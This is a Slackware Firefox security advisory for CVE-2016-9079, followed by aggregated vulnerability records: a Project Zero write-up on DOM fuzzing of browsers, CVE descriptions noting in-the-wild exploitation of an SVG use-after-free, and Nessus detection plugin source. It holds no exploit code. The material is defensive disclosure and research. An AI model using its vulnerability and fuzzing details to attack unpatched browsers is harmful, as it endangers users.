New mozilla-firefox packages are available for Slackware 14.1, 14.2,
and -current to fix security issues.
Here are the details from the Slackware 14.2 ChangeLog:
patches/packages/mozilla-firefox-45.5.1esr-i586-1_slack14.2.txz: Upgraded.
This release contains security fixes and improvements.
For more information, see:
https://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html
https://vulners.com/cve/CVE-2016-9079
(* Security fix *)
Where to find the new packages:
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-firefox-45.5.1esr-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-firefox-45.5.1esr-x86_64-1_slack14.1.txz
Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mozilla-firefox-45.5.1esr-i586-1_slack14.2.txz
Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mozilla-firefox-45.5.1esr-x86_64-1_slack14.2.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-50.0.2-i586-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-50.0.2-x86_64-1.txz
MD5 signatures:
Slackware 14.1 package:
853db455bd60f93b82475f5f2700af79 mozilla-firefox-45.5.1esr-i486-1_slack14.1.txz
Slackware x86_64 14.1 package:
44f72499e02ad701f047ea8d27803927 mozilla-firefox-45.5.1esr-x86_64-1_slack14.1.txz
Slackware 14.2 package:
af1f939c2ead4de1478cae79b2297baf mozilla-firefox-45.5.1esr-i586-1_slack14.2.txz
Slackware x86_64 14.2 package:
1eb46bdcabe75688cd6856bde1a5de27 mozilla-firefox-45.5.1esr-x86_64-1_slack14.2.txz
Slackware -current package:
5f5195148ac5e0bf4d028a67a22e754b xap/mozilla-firefox-50.0.2-i586-1.txz
Slackware x86_64 -current package:
f474a2f0242a75e5f368c1698c6b9f16 xap/mozilla-firefox-50.0.2-x86_64-1.txz
Installation instructions:
Upgrade the package as root:
> upgradepkg mozilla-firefox-45.5.1esr-i586-1_slack14.2.txz
{"googleprojectzero": [{"lastseen": "2020-12-14T19:21:34", "description": "Posted by Ivan Fratric, Project Zero\n\n## Introduction\n\nHistorically, DOM engines have been one of the largest sources of web browser bugs. And while in the recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, [CVE-2016-9079](<https://bugzilla.mozilla.org/show_bug.cgi?id=1321066>) (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox\u2019s DOM implementation, specifically the part that handles SVG elements in a web page. It is also a rare case that a vendor will publish a security update that doesn\u2019t contain fixes for at least several DOM engine bugs.\n\n \n\n\nAn interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers as well as browser vendors who care about security invest into building DOM fuzzers and associated infrastructure.\n\n \n\n\nAs a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing.\n\n## The fuzzer\n\nFor this project I wanted to write a new fuzzer which takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I\u2019m open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extendible and can be reused by myself as well as other researchers for fuzzing other targets besides just DOM fuzzing.\n\n \n\n\nWe named this new fuzzer Domato (credits to Tavis for suggesting the name). Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes HTML/CSS structure as well as various JavaScript objects, properties and functions.\n\n \n\n\nThe fuzzer consists of several parts: \n\n * The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing.\n\n * The main script that parses the arguments and uses the base engine to create samples. Most logic that is DOM specific is captured in this part. \n\n * A set of grammars for generating HTML, CSS and JavaScript code.\n\n \n\n\nOne of the most difficult aspects in the generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach:\n\n \n\n\n 1. I initially extracted DOM API declarations from .idl files in Google Chrome Source. Similarly, I parsed Chrome\u2019s layout tests to extract common (and not so common) names and values of various HTML and CSS properties.\n\n 2. Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior. One example of this are functions and properties that take strings as input: Just because a DOM property takes a string as an input does not mean that any string would have a meaning in the context of that property.\n\n \n\n\nOtherwise, Domato supports features that you\u2019d expect from a DOM fuzzer such as: \n\n * Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers\n\n * Implicit (through grammar definitions) support for \u201cinteresting\u201d APIs (e.g. the Range API) that have historically been prone to bugs.\n\n \n\n\nInstead of going into much technical details here, the reader is referred to the fuzzer code and documentation at [https://github.com/google/domato](<https://github.com/google/domato>). It is my hope that by open-sourcing the fuzzer I would invite community contributions that would cover the areas I might have missed in the fuzzer or grammar creation.\n\n## Setup\n\nWe tested 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100.000.000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100.000.000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the pay range of a determined attacker. For reference, it can be done for about $1k on [Google Compute Engine](<https://cloud.google.com/compute/>) given the smallest possible VM size, preemptable VMs (which I think work well for fuzzing jobs as they don\u2019t need to be up all the time) and 10 seconds per run.\n\n \n\n\nHere are additional details of the fuzzing setup for each browser:\n\n \n\n\n * Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called [ClusterFuzz](<http://dev.chromium.org/Home/chromium-security/bugs/using-clusterfuzz>). To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer and it was run automatically against various Chrome builds.\n\n \n\n\n * Mozilla Firefox was fuzzed on internal Google infrastructure (linux based). Since Mozilla already offers Firefox ASAN builds for download, we used that as a fuzzing target. Each crash was additionally verified against a release build.\n\n \n\n\n * Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of ASAN build, page heap was applied to iexplore.exe process to make it easier to catch some types of issues.\n\n \n\n\n * Microsoft Edge was the only browser we couldn\u2019t easily fuzz on Google infrastructure since Google Compute Engine doesn\u2019t support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That\u2019s why for fuzzing it we created a virtual cluster of Windows 10 VMs on Microsoft Azure. Same as with Internet Explorer, page heap was applied to MicrosoftEdgeCP.exe process before fuzzing.\n\n \n\n\n * Instead of fuzzing Safari directly, which would require Apple hardware, we instead used WebKitGTK+ which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac.\n\n## Results\n\nWithout further ado, the number of security bugs found in each browsers are captured in the table below.\n\n \n\n\nOnly security bugs were counted in the results (doing anything else is tricky as some browser vendors fix non-security crashes while some don\u2019t) and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don\u2019t know if bugs in development version would be caught by internal review and fuzzing process before release).\n\n \n\n\nVendor\n\n| \n\nBrowser\n\n| \n\nEngine\n\n| \n\nNumber of Bugs\n\n| \n\nProject Zero Bug IDs \n \n---|---|---|---|--- \n \nGoogle\n\n| \n\nChrome\n\n| \n\nBlink\n\n| \n\n2\n\n| \n\n994, 1024 \n \nMozilla\n\n| \n\nFirefox\n\n| \n\nGecko\n\n| \n\n4**\n\n| \n\n1130, 1155, 1160, 1185 \n \nMicrosoft\n\n| \n\nInternet Explorer\n\n| \n\nTrident\n\n| \n\n4\n\n| \n\n1011, 1076, 1118, 1233 \n \nMicrosoft\n\n| \n\nEdge\n\n| \n\nEdgeHtml\n\n| \n\n6\n\n| \n\n1011, 1254, 1255, 1264, 1301, 1309 \n \nApple\n\n| \n\nSafari\n\n| \n\nWebKit\n\n| \n\n17\n\n| \n\n999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250 \n \nTotal\n\n| \n\n31* \n \n*While adding the number of bugs results in 33, 2 of the bugs affected multiple browsers\n\n**The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count here.\n\n \n\n\nAll of the bugs listed here have been fixed in the current shipping versions of the browsers. As can be seen in the table most browsers did relatively well in the experiment with only a couple of security relevant crashes found. Since using the same methodology used to result in significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not sufficiently statistically significant to justify saying that one browser\u2019s DOM engine is better or worse than another.\n\n \n\n\nHowever, Apple Safari is a clear outlier in the experiment with significantly higher number of bugs found. This is especially worrying given attackers\u2019 interest in the platform as evidenced by the exploit prices and recent targeted attacks. It is also interesting to compare Safari\u2019s results to Chrome\u2019s, as until a couple of years ago, they were using the same DOM engine (WebKit). It appears that after the Blink/Webkit split either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit.\n\n \n\n\nIt is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of a useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft\u2019s team behind it!\n\n \n\n\nWhen interpreting the results, it is very important to note that they don\u2019t necessarily reflect the security of the whole browser and instead focus on just a single component (DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as presence and security of a sandbox, bugs in other components such as scripting engines etc. I can also not disregard the possibility that, within DOM, my fuzzer is more capable at finding certain types of issues than other, which might have an effect on the overall stats.\n\n## Experimenting with coverage-guided DOM fuzzing\n\nSince coverage-guided fuzzing seems to produce very good results in other areas we wanted to combine it with the DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author's familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and used a modified WinAFL's DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows:\n\n \n\n\n 1. The fuzzer generates a new set of samples by mutating existing samples in the corpus.\n\n 2. The fuzzer spawns IE process which opens a harness HTML page.\n\n 3. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe\n\n 4. After the sample executes, it notifies the harness which notifies the fuzzer to stop collecting coverage.\n\n 5. Coverage map is examined and if it contains unseen coverage, the corresponding sample is added to the corpus.\n\n 6. Go to step 3 until all samples are executed or the IE process crashes\n\n 7. Periodically minimize the corpus using the AFL\u2019s cmin algorithm.\n\n 8. Go to step 1.\n\n \n\n\nThe following set of mutations was used to produce new samples from the existing ones:\n\n \n\n\n * Adding new CSS rules\n\n * Adding new properties to the existing CSS rules\n\n * Adding new HTML elements\n\n * Adding new properties to the existing HTML elements\n\n * Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them.\n\n \n\n\nUnfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way.\n\n## Conclusion\n\nAs stated before, DOM engines have been one of the largest sources of web browser bugs. While this type of bug are far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product\u2019s security posture.\n\n \n\n\nThe big question at the end is: Are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-09-21T00:00:00", "type": "googleprojectzero", "title": "\nThe Great DOM Fuzz-off of 2017\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2017-09-21T00:00:00", "id": "GOOGLEPROJECTZERO:F357B6F771503AA7EA76823BED057E59", "href": "https://googleprojectzero.blogspot.com/2017/09/the-great-dom-fuzz-off-of-2017.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "attackerkb": [{"lastseen": "2021-07-20T20:12:06", "description": "A use-after-free vulnerability in SVG Animation has been discovered. An exploit built on this vulnerability has been discovered in the wild targeting Firefox and Tor Browser users on Windows. This vulnerability affects Firefox < 50.0.2, Firefox ESR < 45.5.1, and Thunderbird < 45.5.1.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:23am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-06-11T00:00:00", "type": "attackerkb", "title": "CVE-2016-9079", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2020-07-30T00:00:00", "id": "AKB:BE641EA6-E2F3-46B4-B343-5B3857F54ECA", "href": "https://attackerkb.com/topics/WdnSxelReG/cve-2016-9079", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhatcve": [{"lastseen": "2022-01-20T21:14:17", "description": "A flaw was found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-01T02:47:37", "type": "redhatcve", "title": "CVE-2016-9079", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2022-01-20T21:01:57", "id": "RH:CVE-2016-9079", "href": "https://access.redhat.com/security/cve/cve-2016-9079", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:07:27", "description": "A use-after-free vulnerability in SVG Animation has been discovered. An\nexploit built on this vulnerability has been discovered in the wild\ntargeting Firefox and Tor Browser users on Windows. This vulnerability\naffects Firefox < 50.0.2, Firefox ESR < 45.5.1, and Thunderbird < 45.5.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-11-30T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9079", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-11-30T00:00:00", "id": "UB:CVE-2016-9079", "href": "https://ubuntu.com/security/CVE-2016-9079", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2023-02-17T15:20:22", "description": "Versions of Mozilla Firefox ESR earlier than 45.5.1 are unpatched for a use-after-free condition in 'dom/smil/nsSMILTimeContainer.cpp' that is triggered when handling SVG animations. With a specially crafted web page, a context-dependent attacker can dereference already freed memory and execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-01-05T00:00:00", "type": "nessus", "title": "Mozilla Firefox ESR < 45.5.1 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2019-11-06T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": "9852.PRM", "href": "https://www.tenable.com/plugins/nnm/9852", "sourceData": "Binary data 9852.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:38:50", "description": "This update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es) :\n\n - A flaw was found in the processing of malformed web content. A web page containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. (CVE-2016-9079)", "cvss3": {}, "published": "2016-12-15T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : thunderbird on SL5.x, SL6.x, SL7.x i386/x86_64 (20161205)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:thunderbird", "p-cpe:/a:fermilab:scientific_linux:thunderbird-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20161205_THUNDERBIRD_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/95870", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95870);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-9079\");\n\n script_name(english:\"Scientific Linux Security Update : thunderbird on SL5.x, SL6.x, SL7.x i386/x86_64 (20161205)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es) :\n\n - A flaw was found in the processing of malformed web\n content. A web page containing malicious content could\n cause Thunderbird to crash or, potentially, execute\n arbitrary code with the privileges of the user running\n Thunderbird. (CVE-2016-9079)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1612&L=scientific-linux-errata&F=&S=&P=15944\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?febe3901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected thunderbird and / or thunderbird-debuginfo\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:thunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"thunderbird-45.5.1-1.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"thunderbird-debuginfo-45.5.1-1.el5_11\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"thunderbird-45.5.1-1.el6_8\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"thunderbird-debuginfo-45.5.1-1.el6_8\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"thunderbird-45.5.1-1.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"thunderbird-debuginfo-45.5.1-1.el7_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird / thunderbird-debuginfo\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:39:05", "description": "This update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es) :\n\n - A flaw was found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2016-9079)", "cvss3": {}, "published": "2016-12-15T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : firefox on SL5.x, SL6.x, SL7.x i386/x86_64 (20161201)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:firefox", "p-cpe:/a:fermilab:scientific_linux:firefox-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20161201_FIREFOX_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/95869", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95869);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-9079\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL5.x, SL6.x, SL7.x i386/x86_64 (20161201)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es) :\n\n - A flaw was found in the processing of malformed web\n content. A web page containing malicious content could\n cause Firefox to crash or, potentially, 